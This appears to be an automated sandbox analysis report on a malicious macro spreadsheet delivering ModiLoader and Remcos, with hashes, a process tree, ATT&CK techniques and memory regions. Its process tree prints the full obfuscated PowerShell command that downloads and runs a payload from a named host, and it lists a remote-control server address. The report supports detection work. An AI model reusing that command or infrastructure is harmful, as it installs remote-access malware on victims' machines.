Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    18-01-2021 16:33

General

  • Target

    Order No-202000125.xlsm

  • Size

    410KB

  • MD5

    2c71ebde60e06f76a2ccc831400f24b7

  • SHA1

    7d7294586a74052bce542ba4cd1fb3eeb2ea08a3

  • SHA256

    cc52b8f39a31d7372f7c3d76e386fa20f830b530dec05ce67229e4abf33c92d9

  • SHA512

    ec36d40a564d98c77a198eed1ab1d0fae309e19800fa00a9f50fdfab6b393bca804c71ca97ce2354c47e707a7d0d84429e280ddb4c0a93730c4f953331b31f87

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://winsfgt.com/php/u.exe

Extracted

Family

remcos

C2

79.134.225.19:2556

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • ModiLoader First Stage 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Order No-202000125.xlsm"
    1⤵
    • Loads dropped DLL
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:792
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start p^owersh^el^l -w 1 (New-Object Net.WebClient).DownloadFile('http://winsfgt.com/php/u.exe',($env:Temp)+'\bFPTx.bat')
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1384
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -w 1 (New-Object Net.WebClient).DownloadFile('http://winsfgt.com/php/u.exe',($env:Temp)+'\bFPTx.bat')
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1716
    • C:\Users\Admin\AppData\Local\Temp\bFPTx.bat
      C:\Users\Admin\AppData\Local\Temp\bFPTx.bat
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Modifies Internet Explorer settings
      • Modifies system certificate store
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:604
      • C:\Program Files (x86)\internet explorer\ieinstal.exe
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        3⤵
          PID:584

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    3
    T1112

    Install Root Certificate

    1
    T1130

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\bFPTx.bat
      MD5

      1982963b64d323f39033d40641437595

      SHA1

      8dde953e501af236d8be98dbf6d683fda458ba38

      SHA256

      60119cfc3cd6b63295c163fad7ab43949d62d5ed6bb024cd3054a2c64e8339c7

      SHA512

      75481182ea78ca9e6ee9022db2e2cfb869419a779e37e149d8c70da3e3f8132dcffcb53a368311bd7dfbe13dab1ee2eae7846aefd361848a375f91d4f61e31b1

    • C:\Users\Admin\AppData\Local\Temp\bFPTx.bat
      MD5

      1982963b64d323f39033d40641437595

      SHA1

      8dde953e501af236d8be98dbf6d683fda458ba38

      SHA256

      60119cfc3cd6b63295c163fad7ab43949d62d5ed6bb024cd3054a2c64e8339c7

      SHA512

      75481182ea78ca9e6ee9022db2e2cfb869419a779e37e149d8c70da3e3f8132dcffcb53a368311bd7dfbe13dab1ee2eae7846aefd361848a375f91d4f61e31b1

    • \Users\Admin\AppData\Local\Temp\bFPTx.bat
      MD5

      1982963b64d323f39033d40641437595

      SHA1

      8dde953e501af236d8be98dbf6d683fda458ba38

      SHA256

      60119cfc3cd6b63295c163fad7ab43949d62d5ed6bb024cd3054a2c64e8339c7

      SHA512

      75481182ea78ca9e6ee9022db2e2cfb869419a779e37e149d8c70da3e3f8132dcffcb53a368311bd7dfbe13dab1ee2eae7846aefd361848a375f91d4f61e31b1

    • \Users\Admin\AppData\Local\Temp\bFPTx.bat
      MD5

      1982963b64d323f39033d40641437595

      SHA1

      8dde953e501af236d8be98dbf6d683fda458ba38

      SHA256

      60119cfc3cd6b63295c163fad7ab43949d62d5ed6bb024cd3054a2c64e8339c7

      SHA512

      75481182ea78ca9e6ee9022db2e2cfb869419a779e37e149d8c70da3e3f8132dcffcb53a368311bd7dfbe13dab1ee2eae7846aefd361848a375f91d4f61e31b1

    • memory/584-50-0x0000000010540000-0x0000000010564000-memory.dmp
      Filesize

      144KB

    • memory/584-51-0x00000000001D0000-0x00000000001F1000-memory.dmp
      Filesize

      132KB

    • memory/584-45-0x00000000001C0000-0x00000000001C1000-memory.dmp
      Filesize

      4KB

    • memory/584-43-0x00000000000D0000-0x00000000000D1000-memory.dmp
      Filesize

      4KB

    • memory/584-42-0x0000000000000000-mapping.dmp
    • memory/584-41-0x0000000000090000-0x0000000000091000-memory.dmp
      Filesize

      4KB

    • memory/604-40-0x00000000002A0000-0x00000000002A1000-memory.dmp
      Filesize

      4KB

    • memory/604-36-0x0000000000000000-mapping.dmp
    • memory/792-2-0x000000002F071000-0x000000002F074000-memory.dmp
      Filesize

      12KB

    • memory/792-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/792-3-0x00000000715E1000-0x00000000715E3000-memory.dmp
      Filesize

      8KB

    • memory/1384-5-0x0000000000000000-mapping.dmp
    • memory/1716-24-0x00000000065B0000-0x00000000065B1000-memory.dmp
      Filesize

      4KB

    • memory/1716-12-0x0000000004850000-0x0000000004851000-memory.dmp
      Filesize

      4KB

    • memory/1716-32-0x0000000006640000-0x0000000006641000-memory.dmp
      Filesize

      4KB

    • memory/1716-23-0x0000000006120000-0x0000000006121000-memory.dmp
      Filesize

      4KB

    • memory/1716-22-0x000000007EF30000-0x000000007EF31000-memory.dmp
      Filesize

      4KB

    • memory/1716-17-0x00000000060E0000-0x00000000060E1000-memory.dmp
      Filesize

      4KB

    • memory/1716-14-0x0000000005240000-0x0000000005241000-memory.dmp
      Filesize

      4KB

    • memory/1716-31-0x00000000062E0000-0x00000000062E1000-memory.dmp
      Filesize

      4KB

    • memory/1716-6-0x0000000000000000-mapping.dmp
    • memory/1716-13-0x0000000004852000-0x0000000004853000-memory.dmp
      Filesize

      4KB

    • memory/1716-11-0x0000000002540000-0x0000000002541000-memory.dmp
      Filesize

      4KB

    • memory/1716-10-0x0000000004890000-0x0000000004891000-memory.dmp
      Filesize

      4KB

    • memory/1716-9-0x0000000000980000-0x0000000000981000-memory.dmp
      Filesize

      4KB

    • memory/1716-8-0x000000006C190000-0x000000006C87E000-memory.dmp
      Filesize

      6.9MB

    • memory/1716-7-0x00000000765E1000-0x00000000765E3000-memory.dmp
      Filesize

      8KB

    • memory/1772-39-0x000007FEF7730000-0x000007FEF79AA000-memory.dmp
      Filesize

      2.5MB